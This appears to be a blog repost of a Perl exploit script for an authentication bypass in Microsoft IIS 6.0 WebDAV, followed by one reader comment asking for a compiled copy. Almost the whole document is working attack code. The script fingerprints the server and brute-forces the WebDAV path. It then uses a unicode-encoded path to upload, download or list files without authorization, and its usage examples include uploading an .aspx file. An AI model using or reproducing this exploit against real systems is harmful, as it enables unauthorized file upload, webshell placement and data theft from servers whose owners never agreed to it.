From:Ph4nt0m Mail List
MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 Options
#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction.
#  v1.0 download、upload and list dir.
#
#  Usage:
#               IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-
file]
#               -target                                                         eg.: 192.168.1.1
#   -port                                                                       eg.: 80
#   -method                                                             eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                                         eg.: webdav
#   -BruteForcePath                             eg.: brute force webdav path
#   -file       (optional)                      eg.: test.aspx
#  Example:
#               put a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#               get a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#               list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#               brute force + list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#               brute force + get file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f
test.aspx

use IO::Socket;
use Getopt::Long;


use threads;
use threads::shared;


# Globals Go Here.
my $target;                             # Host being probed.
my $port;                                       # Webserver port.
my $method;                             # HTTP Method, PUT GET or .
my $xpath;                              # WebDAV path on Webserver.
my $bpath;                              # Bruteforce WebDAV path.
my $file;                                       # file name.
my $httpmethod;
my $Host_Header;        # The Host header has to be changed


GetOptions(
        "target=s"      => \$target,
        "port=i"        => \$port,
        "method=s"      => \$method,
        "xpath=s"       => \$xpath,
        "bpath=s"       => \$bpath,
        "file=s"        => \$file,
        "help|?"        => sub {
                                hello();
                                exit(0);
                           }
);


$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!
$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!
$bpath));
$error .= "Error: You must specify a upload or download file name\n"
if ((!$file) && $method != "l");


if ($error) {
        print "Try $0 -help or -?' for more information.\n$error\n" ;
        exit;



}


hello();

if ($method eq "p") {
        $httpmethod = "PUT";


} elsif ($method eq "g") {


  $httpmethod = "GET";

} elsif ($method eq "l") {


  $httpmethod = "PROPFIND";

} else {


  print "$method Method not accept !!!\n";
  exit(0);


}


# ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);

}


#end of brute force
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytes\n";
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  while(read(INFO, $data, $filesize))
  {
        $content .= $data;
  }
  close(INFO);
  #print $content;

  $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length:
$filesize\r\n";


} elsif ($httpmethod eq "GET") {


        $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n
\r\n";

} elsif ($httpmethod eq "PROPFIND") {


        $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type:
text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
        $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?

><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/


props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></
D:propfind>";

}


print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x
60 ."\n";

# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n
$Host_Header\r\n$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}


} elsif ($httpmethod eq "GET") {


        @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n
$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}

} elsif ($httpmethod eq "PROPFIND") {


        @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n
$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}

}


#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
        $flag="on";


} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
        $flag="off";
}


print "-" x 60 ."\n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
          print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
          ++$line_no;
            if ($line =~ /^Accept-Ranges: bytes\r\n/){
                  last;
            }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);


          print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease
check $file on local disk\r\n";


  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
        foreach $line (@results){
            if ($line =~ /^\<\?xml version\=/i){
                  my @list = split("<a:href>", $line);
                  foreach $path (@list) {
                        $no = index($path,"<");
                        $result.=substr($path, 0, $no)."\n";
                  }
                  print $result;
                  last;
            }
    }
  }


} else {


        print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";

}


print "-" x 60 ."\n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=\&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die
("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeout\n";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}



}


sub ermm{
        $flagexit=1;
        close (S);


}


sub webdavtest {
        my ($testip,$testport)=@_;
  print "-" x 60 ."\n";
  print "Testing WebDAV methods [$testip $testport]\n";
  print "-" x 60 ."\n";
  @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,
10);
  if ($#results < 1){die "10s timeout to $target on port $testport
\n";}
  #print @results;
  $flag="off";
  foreach $line (@results){
          if ($line =~ /^Server: /){
                  ($left,$right)=split(/\:/,$line);
                  $right =~ s/ //g;
                  print "$target : Server type is : $right";

            if ($right !~ /Microsoft-IIS/i){
                    print "$target : Not a Microsoft IIS Server\n";
                    exit(0);
            }
          }


          if ($line =~ /^DAV: /){
                  $flag="on";
          }


          if ($line =~ /^Public: / && $flag eq "on"){
            ($left,$right)=split(/\:/,$line);
            $right =~ s/ //g;
            print "$target : Method type is : $right";
            if ($right !~ /$httpmethod/i){
              print "$target : Not allow $httpmethod on this WebDAV Server
\n";
              exit(0);
            } else {
              $flag="on";
            }
          }
  }
  if ($flag eq "off") {
    print "$target : WebDAV disable\n";
    exit(0);
  }



}


sub webdavbf {
        my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."\n";
  print "Try to brute forceing WebDAV path ...\n";
  print "-" x 60 ."\n";
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
        chomp($lines);

          $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type:
text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
          $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=
\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://
apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/



></D:prop></D:propfind>";


          @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",
$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}

    print "[$lines]...$results[0]";


        #maybe this response
        #HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
        print "Find out path on [$lines]\n";
            return $lines;
            last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(\n";
  exit(0);



}


sub hello{
  print "\n";
  print "\t ##################################################\n";
  print "\t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #\n";
  print "\t #  **************** !!! WARNING !!! **************#\n";
  print "\t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#\n";
  print "\t #  ***********************************************#\n";
  print "\t #  Written by csgcsg 090529                       #\n";
  print "\t ###################################################\n";
  print "\n\t $0 -target -port -method -webdavpath [-file]\n";
  print "\n\t -target\t\t eg.: 192.168.1.1\n";
  print "\t -port\t\t\t eg.: 80\n";
  print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
  print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n";
  print "\t -file\t\t\t eg.: test.aspx\n\n";
  print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f
test.aspx\n";
Tags: , , ,
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(14796)
pzy4141
June 4, 2009 19:58
有编译好的么?我编译总出错,麻烦你拉,E-mail:hack163@qq.com
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive